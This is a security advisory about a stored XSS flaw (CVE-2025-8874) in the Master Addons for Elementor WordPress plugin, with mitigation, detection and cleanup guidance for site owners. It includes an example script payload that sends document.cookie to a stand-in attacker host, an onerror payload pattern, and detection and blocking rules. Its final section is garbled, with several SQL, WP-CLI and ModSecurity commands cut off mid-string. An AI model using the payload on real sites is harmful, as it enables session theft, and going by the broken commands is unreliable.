Master Addons for Elementor (<= 2.0.9.0) — Authenticated Contributor Stored XSS via fancyBox (CVE-2025-8874): what site owners need to know and how to protect their WordPress sites

Summary

A stored cross-site scripting (XSS) vulnerability affecting Master Addons for Elementor (fixed in 2.0.9.1) allows an authenticated user with Contributor-level privileges to store malicious HTML/JavaScript via the plugin’s use of the fancyBox lightbox/caption fields. The stored payload executes when visitors view affected front-end pages. Although the CVSS score is moderate (6.5), the practical impact can be significant — arbitrary script execution in your domain context, which can lead to site defacement, redirects, cookie theft, or chained attacks against higher-privileged users.

This post, written with a pragmatic Hong Kong security expert tone, explains what happened, how it can be exploited, immediate mitigations you can apply before patching, detection and cleanup steps, and developer guidance to reduce recurrence.

This post covers

• What happened and which versions are affected
• Technical root cause and likely exploit path
• Immediate mitigations you can apply right now (server/site-level)
• Detection and cleanup guidance (including WP-CLI and SQL examples)
• Developer notes for plugin authors and site integrators

Vulnerability at a glance

• Affected plugin: Master Addons for Elementor — versions <= 2.0.9.0
• Fixed in: 2.0.9.1
• Vulnerability: Stored Cross-Site Scripting (XSS) via fancyBox usage
• CVE: CVE-2025-8874
• Required privilege: Contributor (authenticated user)
• Impact: Stored XSS executed in the context of the site when a visitor opens a fancyBox item or when the plugin renders unsanitized fields
• Patch priority: Low/Moderate (exploitability depends on contributor access and theme/plugin usage)

Why this matters: stored XSS is persistent

Stored XSS means an attacker stores a malicious payload on the site (in the database or persistent storage) and that payload is later delivered to other users’ browsers without proper encoding or sanitization. Unlike reflected XSS, an attacker doesn’t need to trick a victim into clicking a crafted URL; they only need the ability to save content that will be viewed by others.

Contributor accounts on many sites can upload images, edit captions, or create gallery items. If those fields are rendered into HTML attributes or caption markup by the plugin without escaping, an attacker can inject JavaScript that runs for visitors and administrators.

Technical explanation — how the exploit works (high level)

1. The plugin uses fancyBox to render images/lightboxes on the front end. fancyBox supports attributes like data-caption, title, and other parameters that can contain HTML.
2. The plugin stores user-supplied strings (captions, titles, alt text, meta fields) in post meta or widget settings and outputs them into front-end markup. In some plugin versions the output is not properly sanitized/escaped.
3. A contributor user creates or edits content (image caption, widget settings) and injects HTML/JavaScript payloads — e.g. inline <script> tags, onerror attributes, or event handlers inside markup stored in a caption or data attribute.
4. When a visitor opens the fancyBox or when the gallery widget is rendered, the stored HTML is inserted into the DOM and the browser executes the attacker-controlled script.

Example (simplified)

An attacker stores a caption such as:

<script>fetch('https://attacker.example/collect?c='+document.cookie)</script>

If the plugin writes this caption into the page without escaping:

<div class="fancybox-caption"></div>

the script runs in the user’s browser when they view the page.

Another common vector is payloads in image attributes:

<img src="x" onerror="/* malicious JS */">

If the fancyBox output inserts attributes into the DOM unsafely, the onerror will execute when the lightbox attempts to load the invalid src.

Immediate actions for site owners (fast, before patching)

If you manage sites with the affected plugin and cannot update immediately, perform the following actions in order to reduce exposure and buy time for full remediation.

1. Update the plugin to 2.0.9.1 (recommended)

   The vendor released a fix in 2.0.9.1. This is the safest and most permanent action — update immediately where possible.

2. Temporarily restrict contributor activity

   Change Contributor users to a lower-risk role (e.g., Subscriber) or temporarily disable new contributor registrations. If contributors are required for workflow, move to an editor-managed approval process until patched.

3. Disable vulnerable widgets/features

   If you control theme or page templates, temporarily remove or disable gallery/lightbox widgets supplied by the plugin. Remove shortcodes, widgets, or Elementor elements that render fancyBox or gallery output until the site is patched.

4. Apply an emergency server rule or virtual patch

   Block incoming requests that include suspicious payloads targeting known fancyBox fields or admin endpoints where contributors post data. Examples to inspect and block:

   • POST requests to admin-ajax.php, wp-admin/post.php, post-new.php that contain <script> tags or onerror= attributes in form fields.
   • Requests containing data-fancybox or data-caption fields with script tags.

   If you operate ModSecurity or similar host-level rules, enable a rule that inspects request bodies for angle-bracket characters in fields that should be plain text.

5. Add a restrictive Content Security Policy (CSP) temporarily

   A strict CSP can prevent inline script execution and reduce the risk of stored XSS payloads executing. Example (test first — this can break site functionality):

   Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-...'; object-src 'none'; base-uri 'self'

   Note: CSPs require site-specific tuning. Test on staging before applying to production.

6. Tighten file upload controls

   Ensure Contributors cannot upload files with dangerous extensions. Limit MIME types and monitor server upload directories for unexpected files.

7. Monitor logs and traffic

   Look for unusual admin POST traffic, new posts or attachments created by contributor accounts, and requests with suspicious payloads. Preserve logs for incident response.

Detection: how to find if your site has stored payloads

Use the following queries and commands to locate suspicious content in the WordPress database and files. Adapt to your DB prefix and environment.

Search posts and postmeta for HTML tags commonly used in XSS:

-- SQL (phpMyAdmin or via WP-CLI)
SELECT ID, post_title, post_author FROM wp_posts
 WHERE post_content LIKE '%<script%' OR post_content LIKE '%onerror=%' OR post_content LIKE '%javascript:%';

SELECT post_id, meta_key, meta_value FROM wp_postmeta
 WHERE meta_value LIKE '%<script%' OR meta_value LIKE '%onerror=%' OR meta_value LIKE '%data-fancybox%';

WP-CLI examples:

wp db query "SELECT ID, post_title, post_author FROM wp_posts WHERE post_content LIKE '%

grep -RIn --exclude-dir=wp-content/uploads 'onerror\|

SELECT ID, post_title, post_date, post_author FROM wp_posts
 WHERE post_author IN (SELECT ID FROM wp_users WHERE user_role LIKE '%contributor%')
   AND post_date > '2025-08-01';

SecRule REQUEST_URI|ARGS|REQUEST_BODY "@rx (

wp db query "SELECT ID, post_title FROM wp_posts WHERE post_content LIKE '%

wp db query "UPDATE wp_posts SET post_content = REGEXP_REPLACE(post_content, ']*>.*?', '', 'i') WHERE post_content REGEXP ']*>.*?'; "

wp db query "SELECT post_id, meta_key FROM wp_postmeta WHERE meta_value LIKE '%data-fancybox%' OR meta_value LIKE '%fancybox%';"

SecRule REQUEST_URI|ARGS|REQUEST_BODY "@rx (

Header set Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'"